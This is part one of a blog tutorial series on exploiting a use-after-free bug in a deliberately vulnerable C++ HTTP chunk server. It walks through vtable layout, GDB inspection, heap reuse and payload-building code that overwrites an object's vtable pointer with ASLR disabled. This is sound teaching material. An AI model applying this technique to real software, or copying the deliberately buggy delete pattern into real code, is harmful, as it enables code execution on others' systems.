This is part one of a series of articles. Here is part two.
Introduction
I think my interest in computer security was initially sparked in the 1990s by movies like Sneakers and The Net and then by the book Practical Unix and Internet Security. Since then I have dabbled in it every once in a while, although it never was and still isn’t a major part of my day job. A couple of years ago I wanted to take a deeper dive, so I played around a bit with reverse engineering, stack overflows and shellcode. But as operating systems and applications keep employing ever more sophisticated techniques to keep hackers out, today’s vulnerabilities and exploits are a lot more complex than simple stack overflows. So I wanted to really understand a modern exploit for a somewhat realistic vulnerability. This series of articles describes what I came up with. If you’re wondering what to expect: I’m talking about an exploit for a use-after-free bug that uses a heap spray and ROP to overwrite the vtable of an object and inject the malicious code… Don’t be afraid if you have no idea what these terms mean; I will explain them step by step. However, you should have some knowledge of C++ (or at least C), assembly and simple exploits like stack overflows. My hope is to bridge the gap between basic articles like the 1996 classic Smashing the Stack for Fun and Profit and very advanced material like what is published by Google’s Project Zero.
The victim program and its vulnerability
For this series of articles I will use a vulnerability in a "victim" program that I wrote specifically for this purpose. This program (uaf-overwrite-vtable.cpp) is a server written in C++ that receives data over HTTP and stores it for further processing. This data is transferred in blocks or chunks using the Chunked Transfer Encoding mechanism. It is base64-encoded, so it could be binary data, but neither the format nor the content is relevant to the vulnerability or the exploit. In fact, the actual data processing is not even implemented in the program.
So what does this program look like? The following listing shows how the chunks are read. As the program is started with socat, it can simply communicate with the client via standard input and output.
    std::vector<HTTPChunk*> chunks;
    unsigned long chunk_num = 0, chunk_size;
    while (true) {
        std::getline(std::cin, line);
        line.erase(line.find("\r"));
        chunk_num++;
        chunk_size = std::stoul(line, nullptr, 16);
        std::fprintf(stderr, "Chunk #%ld has %ld bytes\n", chunk_num, chunk_size);
        if (chunk_size == 0) {
            std::fprintf(stderr, "Final chunk received, terminating\n");
            std::cout << "HTTP/1.1 200 OK\r\n";
            break;
        }
        else if (chunk_size <= MAX_CHUNK_SIZE) {
            auto p_chunk = new HTTPChunk(std::cin, chunk_size);  // (1)
            chunks.push_back(p_chunk);                           // (2)
            std::fprintf(stderr, "Chunk object at %p, decoded size = %ld\n", p_chunk, p_chunk->get_decoded_size());
        }
        else {
            std::fprintf(stderr, "Chunk size %ld exceeds maximum size, aborting\n", chunk_size);
            std::cout << "HTTP/1.1 400 Bad Request\r\n";
            break;
        }
    }
As you can see, an object of the HTTPChunk class is created for each chunk (1) and these objects are stored in a vector (2). The memory for these objects is allocated on the heap (via the new operator).
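To make the input format more concrete, here is a minimal sketch of how a client could frame its data. It assumes the standard HTTP/1.1 chunked layout (chunk size in hexadecimal, CRLF, chunk data, CRLF); whether the victim consumes the trailing CRLF in exactly this way is an assumption, and the helper names frame_chunk and final_chunk are hypothetical, not part of the victim or the exploit script.

```cpp
#include <cassert>
#include <sstream>
#include <string>

// Frame one non-empty chunk: size in hexadecimal, CRLF, the data, CRLF.
// (Hypothetical helper for illustration only.)
std::string frame_chunk(const std::string& data) {
    // A size of zero is reserved for the terminating chunk.
    assert(!data.empty());
    std::ostringstream out;
    out << std::hex << data.size() << "\r\n" << data << "\r\n";
    return out.str();
}

// The terminating chunk has size zero and no data.
std::string final_chunk() {
    return "0\r\n\r\n";
}
```

With this framing, a 16-character base64 string is announced as size 10 (hexadecimal), which the victim's std::stoul(line, nullptr, 16) call parses as 16.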
Later in the program, we can find this piece of code:
    for (auto p_chunk : chunks) {
        chunk_num++;
        try {
            auto p_decoded_chunk = new unsigned char[p_chunk->get_decoded_size()];
            decoded_chunks.push_back(p_decoded_chunk);
            std::fprintf(stderr, "Buffer for decoded chunk #%ld at %p\n", chunk_num, p_decoded_chunk);
            p_chunk->get_decoded_content(p_decoded_chunk, p_chunk->get_decoded_size());
        }
        catch (std::exception& e) {
            std::fprintf(stderr, "Exception '%s' occurred while decoding chunk, deleting object\n", e.what());
            delete p_chunk;  // (3)
        }
    }
You will probably notice that it contains a (rather obvious) bug. If an exception occurs while trying to decode a chunk (if the data in this chunk is not properly base64-encoded), the chunk object’s memory is freed (3) but the object is kept in the vector. So if the program later iterates again over all objects in the vector (in this case to free them before exiting), it will also access the objects already freed. This constitutes a so-called use-after-free bug.
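For contrast, here is a minimal sketch of how such a loop could avoid leaving a dangling pointer behind. It is not the victim's code: Chunk is a hypothetical stand-in for HTTPChunk, and the live counter exists only to make the object lifetimes observable.

```cpp
#include <cassert>
#include <stdexcept>
#include <vector>

// Hypothetical stand-in for HTTPChunk; decode() fails for invalid data.
struct Chunk {
    static int live;  // number of Chunk objects currently alive
    bool valid;
    explicit Chunk(bool v) : valid(v) { ++live; }
    ~Chunk() { --live; }
    void decode() const {
        if (!valid) throw std::runtime_error("bad base64 data");
    }
};
int Chunk::live = 0;

// Decode all chunks; returns the number of chunks that failed.
int process(std::vector<Chunk*>& chunks) {
    int failed = 0;
    for (auto& p_chunk : chunks) {  // reference, so the vector slot can be changed
        assert(p_chunk != nullptr);
        try {
            p_chunk->decode();
        } catch (const std::exception&) {
            delete p_chunk;
            p_chunk = nullptr;  // no dangling pointer stays in the vector
            ++failed;
        }
    }
    return failed;
}

// Free the remaining objects before exiting.
void cleanup(std::vector<Chunk*>& chunks) {
    for (auto p_chunk : chunks) {
        delete p_chunk;  // deleting a null pointer is a no-op
    }
    chunks.clear();
}
```

The only differences to the vulnerable pattern are the reference in the range-based for loop and the assignment of nullptr after the delete. Storing std::unique_ptr in the vector would be the more idiomatic way to get the same effect.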
Exploiting the vulnerability
So how can we exploit this bug, thus turning it into a vulnerability? First off, we can only use it for our purposes if we are able to overwrite the freed memory with data we control, that is, data we can somehow feed into the program. Then there are two possibilities, depending on what was stored in the memory that was freed. If it was data, that is the values of variables, we can change them and thereby maybe alter the program flow. A classic example would be a variable (or the attribute of an object) that stores the id of the authenticated user. If we replace the id of our user with the id of a user with extended privileges (e.g. root with the id 0 on Unix / Linux), we might be able to make the buggy program do things we wouldn’t otherwise be allowed to do (a so-called privilege escalation).
If the freed memory contained code or a code address, e.g. a function pointer, we can change the program’s behavior in much more far-reaching ways. If we’re able to change either the code directly or the code address so that it points to code we injected into the program, we can make the program do pretty much anything we want. And this is exactly the case we have on our hands here: a function pointer, or to be more precise, a pointer to a method.
You might wonder now where in our victim program a method pointer could be. To answer that question, we need to take a closer look at the HTTPChunk class.
HTTPChunk class

    class HTTPChunk
    {
        unsigned char* mp_buffer;  // (1)
        size_t m_buffer_size;
    public:
        HTTPChunk(std::istream& input_stream, size_t chunk_size);
        virtual ~HTTPChunk();  // (2)
        size_t get_decoded_size() const;
        virtual void get_decoded_content(unsigned char* p_buffer, size_t buffer_size);  // (3)
    };
It mainly consists of a buffer for the chunk data (1), which gets allocated when an object of this class is constructed, a destructor (2) that frees this buffer, and a method get_decoded_content (3) that decodes the base64-encoded chunk data and writes it into a caller-supplied buffer. Crucial to the vulnerability and the exploit is the fact that the class has virtual methods (get_decoded_content and the destructor). Virtual methods cause the compiler to generate a table of these methods for the class, the so-called virtual method table or vtable. The methods are not invoked directly but indirectly, through the pointers stored in this table. The reasons for this and the details are explained in the linked Wikipedia article. Even more information can be found in this and this article.
So if we’re able to change the vtable, we might be able to execute injected code. But before we can change the vtable (or even replace it completely), we first need to know where it’s located in the program. The following GDB session shows us (the program was stopped at the line marked with (2) in listing 1).
    pwndbg> set print asm-demangle on
    pwndbg> set print demangle on
    pwndbg> p sizeof(HTTPChunk)    (1)
    $1 = 12
    pwndbg> x/3dx p_chunk    (2)
    0x88d9c40:  0x0804feb8  0x088d9c50  0x00000001
    pwndbg> i sym 0x0804feb8
    vtable for HTTPChunk + 8 in section .data.rel.ro of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable
    pwndbg> x/3dx 0x0804feb8    (3)
    0x804feb8 <vtable for HTTPChunk+8>:  0x0804acca  0x0804ad26  0x0804ad7a
    pwndbg> i sym 0x0804acca
    HTTPChunk::~HTTPChunk() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable    (4)
    pwndbg> i sym 0x0804ad26
    HTTPChunk::~HTTPChunk() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable    (5)
    pwndbg> i sym 0x0804ad7a
    HTTPChunk::get_decoded_content(unsigned char*, unsigned int) in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable    (6)
As you can see (1), the size of HTTPChunk objects is 12 bytes or 3 double words (on a 32-bit processor architecture, which is what our program was compiled for). Two of them are of course the object attributes, the pointer to the buffer holding the chunk data and the chunk size, respectively. But what about the third double word? To find out, I dumped an object and checked if any of the double words can be found in the program’s symbol table (2). And lo and behold, the first one points to the vtable of the HTTPChunk class (actually not to the start of the table but 8 bytes in, but this is not relevant here). Now we know that objects of a class with virtual methods start with a pointer to the vtable (at least if we use GCC; the memory layout of an object depends on the compiler). You can also see that the vtable is stored in a write-protected memory area, namely the .data.rel.ro section of the program.
So what does the table itself look like? It again consists of three double words, the pointers to the virtual methods (3). You might now wonder why there are two destructors and you wouldn’t be alone. This answer on Stack Overflow explains why GCC creates two, namely the so-called complete object destructor (4) and the deleting destructor (5). The third pointer (6) points of course to the get_decoded_content method.
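The hidden pointer can also be observed without a debugger. The following is a small sketch with two hypothetical structs (PlainChunk and VirtualChunk, not the victim's class) that have the same attributes and differ only in having virtual methods. It assumes a compiler that, like GCC, places a single vtable pointer at the start of the object; the C++ standard does not guarantee this layout.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Same attributes as HTTPChunk, but no virtual methods.
struct PlainChunk {
    unsigned char* mp_buffer = nullptr;
    std::size_t m_buffer_size = 0;
};

// Same attributes plus virtual methods, so the compiler adds a vtable pointer.
struct VirtualChunk {
    unsigned char* mp_buffer = nullptr;
    std::size_t m_buffer_size = 0;
    virtual ~VirtualChunk() {}
    virtual void get_decoded_content() {}
};

// Copy out the first pointer-sized word of the object's representation.
// With GCC's layout this is the pointer into the vtable.
std::uintptr_t first_word(const VirtualChunk& obj) {
    std::uintptr_t word = 0;
    std::memcpy(&word, static_cast<const void*>(&obj), sizeof word);
    return word;
}
```

Under the stated assumption, sizeof(VirtualChunk) is larger than sizeof(PlainChunk) by exactly one pointer, and first_word returns the same value for every VirtualChunk object because all objects of a class share one vtable.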
This knowledge enables us now to outline a possible exploit for the vulnerability in the victim program.
1. We inject the code we want to execute into the program.
2. We construct a new vtable where one pointer doesn’t point to a method of the class but to the injected code instead. This vtable must also be injected into the program.
3. We overwrite the pointer to the vtable of an existing object with a pointer to the vtable constructed in step 2.
If the method with the overwritten pointer is later called on the modified object, our injected code will be executed… bingo :-) The remainder of this article and the other two articles in this series will show you how to perform the exploit in detail.
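The effect of swapping the vtable pointer can be modeled safely with ordinary function pointers. The sketch below is a hand-rolled model, not what the compiler literally generates and not the exploit itself: ModelObject, real_vtable, fake_vtable and call_virtual are hypothetical names, and the routines just return strings so the dispatch can be observed.

```cpp
#include <cstddef>
#include <string>

using Method = std::string (*)();

std::string real_destructor()  { return "HTTPChunk::~HTTPChunk() called"; }
std::string real_decode()      { return "decoding chunk"; }
std::string pwned_destructor() { return "You've been pwned!!!"; }

// Model of an object whose first member is the pointer to the vtable.
struct ModelObject {
    const Method* vptr;
    unsigned char* mp_buffer;
    std::size_t m_buffer_size;
};

// Two destructor slots and one method slot, as in the GDB session.
const Method real_vtable[] = { real_destructor, real_destructor, real_decode };

// The replacement table: every slot points to the attacker's routine.
const Method fake_vtable[] = { pwned_destructor, pwned_destructor, pwned_destructor };

// A virtual call in this model: load the table, pick a slot, call through it.
std::string call_virtual(const ModelObject& obj, std::size_t slot) {
    return obj.vptr[slot]();
}
```

As long as vptr points to real_vtable, call_virtual(obj, 1) runs the real destructor. After obj.vptr = fake_vtable, the very same call runs pwned_destructor, although the calling code has not changed at all.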
Step 1: Calling a pre-defined routine in the victim
In this first step we will make our lives a little easier. Instead of injecting the malicious code, that is the code we want to execute, we will incorporate it in the victim program as a routine. This is of course (in most cases) not a realistic scenario, but it makes it easier to develop the exploit step by step. So this means we "only" need to replace the pointer to the vtable and the vtable itself.
To change the pointer to the vtable of an existing object, we make use of several facts. First, all objects stored in the vector chunks are processed in a loop one after another. Second, when the decoding of an object’s data fails, the object’s memory is freed but the pointer to the object is kept in the vector (see listing 2). Finally, a new buffer for the decoded chunk data is allocated for each object that is processed in the loop. This means that after one object’s memory (which contains the pointer to the vtable) has been freed, new memory is allocated that we can fill with arbitrary data (because it’s the buffer for the next chunk’s decoded data). We just need to find a way to force the program to re-use the object’s memory for the next allocation; then we’re able to modify deleted objects arbitrarily. I don’t want to go into the details of how memory allocations work on Linux with the GNU C standard library (the operator new uses the routine malloc under the hood). But an easy way is to make the size of the next chunk’s decoded data match the size of the HTTPChunk objects (depending on the block size used by malloc and the size of the objects, it might also work if the next chunk is slightly smaller).
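Whether a freed block is handed out again can be probed with a few lines of code. This is only a sketch: ReuseProbe and probe_reuse are hypothetical names, and the result depends on the allocator, its version and the state of the heap, so no particular outcome is guaranteed.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdlib>

struct ReuseProbe {
    std::uintptr_t freed_addr;  // address of the block that was freed
    std::uintptr_t next_addr;   // address returned by the next allocation
    bool reused() const { return freed_addr == next_addr; }
};

// Allocate and free a block of freed_size bytes, then allocate next_size
// bytes and report both addresses.
ReuseProbe probe_reuse(std::size_t freed_size, std::size_t next_size) {
    void* first = std::malloc(freed_size);
    // Record the address as an integer before freeing the block.
    const auto freed_addr = reinterpret_cast<std::uintptr_t>(first);
    std::free(first);

    void* second = std::malloc(next_size);
    const auto next_addr = reinterpret_cast<std::uintptr_t>(second);
    std::free(second);

    return ReuseProbe{freed_addr, next_addr};
}
```

Calling probe_reuse(12, 12) mirrors the situation in the victim, where a 12-byte object is freed and a 12-byte buffer is requested right afterwards. Trying other values for next_size gives a feeling for how close the sizes have to be on a given system.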
So what we need for the exploit is two specially constructed chunks that we feed into the program. The first chunk can be any size, but it needs to contain incorrectly encoded data. The size of the decoded second chunk must, as I just explained, equal the size of the HTTPChunk objects (12 bytes) and it must contain a pointer to the new vtable (the other data doesn’t matter).
The new vtable itself will be injected into the program using a third chunk. This vtable consists of three entries, each a pointer to the routine pwned_destructor in the program. This is the routine that contains the "malicious" code we want to execute (it just prints the string "You’ve been pwned!!!").
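The two payloads can be sketched as follows. This is not the author's exploit script (which is written in Python); the function names are hypothetical, the addresses are parameters because they depend on the build and on the memory layout at run time, and the filler byte 'x' is an arbitrary choice. A 32-bit little-endian target is assumed.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Append a 32-bit value in little-endian byte order (as used on x86).
void append_le32(std::string& out, std::uint32_t value) {
    for (int shift = 0; shift < 32; shift += 8) {
        out.push_back(static_cast<char>((value >> shift) & 0xff));
    }
}

// 12 bytes that overlay a freed HTTPChunk: fake vtable pointer plus filler.
std::string make_fake_object(std::uint32_t fake_vtable_addr) {
    std::string bytes;
    append_le32(bytes, fake_vtable_addr);
    bytes.append(8, 'x');  // overlays mp_buffer and m_buffer_size
    assert(bytes.size() == 12);
    return bytes;
}

// Three vtable slots that all point to the same routine.
std::string make_fake_vtable(std::uint32_t routine_addr) {
    std::string bytes;
    for (int slot = 0; slot < 3; ++slot) {
        append_le32(bytes, routine_addr);
    }
    return bytes;
}

// Standard base64 encoding with '=' padding.
std::string base64_encode(const std::string& in) {
    static const char table[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string out;
    for (std::size_t i = 0; i < in.size(); i += 3) {
        const std::size_t remaining = in.size() - i;
        // Pack up to three input bytes into one 24-bit group.
        std::uint32_t group = static_cast<unsigned char>(in[i]) << 16;
        if (remaining > 1) group |= static_cast<unsigned char>(in[i + 1]) << 8;
        if (remaining > 2) group |= static_cast<unsigned char>(in[i + 2]);
        out.push_back(table[(group >> 18) & 63]);
        out.push_back(table[(group >> 12) & 63]);
        out.push_back(remaining > 1 ? table[(group >> 6) & 63] : '=');
        out.push_back(remaining > 2 ? table[group & 63] : '=');
    }
    return out;
}
```

Since 12 bytes encode to exactly 16 base64 characters without padding, the second and third chunk each have a transmitted size of 16 bytes and a decoded size of 12 bytes.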
You might think we’d be done now, and you would have been right 15 or 20 years ago. But nowadays systems usually use ASLR to prevent exactly this kind of attack. This means that all memory addresses (code and data) are randomized and differ from one invocation of a program to the next. So there is no (easy) way for us to know where the pwned_destructor routine and the buffer for the decoded third chunk (which contains our vtable) are located. I will show you a way to (partially) bypass ASLR in the second article of this series, but for now we will just disable it when we run the victim program (with the setarch command).
The following listing shows the (shortened) output of the program when the exploit is run against it (using the script exploit-uaf.py).
    $ setarch $(uname -m) -R socat tcp-l:9999,reuseaddr exec:./uaf-overwrite-vtable
    Waiting for requests...
    Reading chunks...
    Chunk #1 has 1 bytes
    Chunk object at 0x8056c40, decoded size = 0
    Chunk #2 has 16 bytes
    Chunk object at 0x8056c70, decoded size = 12    (1)
    Chunk #3 has 16 bytes
    Chunk object at 0x8056c60, decoded size = 12
    Chunk #4 has 0 bytes
    Final chunk received, terminating
    Processing chunks...
    Buffer for decoded chunk #1 at 0x8056ca0
    Exception 'Size of base64-encoded data is not a multiple of 4' occurred while decoding chunk, deleting object    (2)
    HTTPChunk::~HTTPChunk() called    (3)
    Buffer for decoded chunk #2 at 0x8056c40    (4)
    Buffer for decoded chunk #3 at 0xe8ea9010
    You've been pwned!!!    (5)
    HTTPChunk::~HTTPChunk() called
    HTTPChunk::~HTTPChunk() called
There are a few things to note here. First, we can see that the size of the decoded second chunk is the same as the size of the HTTPChunk objects (1), which is, as stated before, a prerequisite for the exploit to work. In the line marked with (2) we see that an exception occurs when the victim tries to decode the first chunk and the chunk object gets deleted, which is confirmed by the next line (3) that tells us that the destructor is called. All the magic happens when the buffer for the second chunk is allocated (4) because it gets allocated at the address where the deleted first chunk object lived (0x8056c40), thus overwriting the object’s memory. The line marked with (5) shows us that the exploit actually works.
We can also take a look at the program with a debugger right before the first chunk object is about to be deleted for the second time (before the program exits, at line 174).
    pwndbg> x/3dx p_chunk
    0x8056c40:  0xe8ea9010  0x78787878  0x78787878    (1)
    pwndbg> x/3dx 0xe8ea9010
    0xe8ea9010:  0x0804a3dd  0x0804a3dd  0x0804a3dd    (2)
    pwndbg> i sym 0x0804a3dd    (3)
    pwned_destructor() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable
This confirms that the object’s memory has been overwritten with a pointer to our fake vtable (1), which is a pointer to the buffer for the decoded third chunk (0xe8ea9010), and that the vtable consists of pointers to pwned_destructor ((2) and (3)).
With that we have reached the end of part one of this series. In part two we will make the exploit more realistic by defeating ASLR and actually injecting the malicious code. Stay tuned if you liked it so far…